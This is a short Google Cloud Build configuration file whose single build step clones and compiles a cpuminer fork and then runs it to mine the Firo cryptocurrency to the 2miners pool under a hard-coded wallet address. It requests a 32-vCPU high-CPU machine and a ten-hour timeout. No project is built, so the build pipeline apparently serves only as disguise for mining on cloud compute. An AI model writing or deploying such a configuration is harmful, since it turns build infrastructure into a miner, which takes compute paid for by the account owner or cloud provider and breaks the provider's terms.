steps:
  - name: 'gcr.io/cloud-builders/gcloud'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          apt-get update
          apt-get install -y wget
          apt-get install -y apt-utils
          apt-get install -y automake autoconf pkg-config libcurl4-openssl-dev libjansson-dev libssl-dev libgmp-dev make g++
          git clone https://github.com/firoorg/cpuminer
          chmod -R 777 cpuminer
          cd cpuminer
          ./build.sh
          ls -al
          /workspace/cpuminer/./cpuminer -a mtp -o stratum+tcp://firo.2miners.com:8181 -u aBLVfkCbCHagdcVM9weTRyiB5x6rSkzsq7.gccb -p x
options:
  machineType: 'N1_HIGHCPU_32'
timeout: 36000s
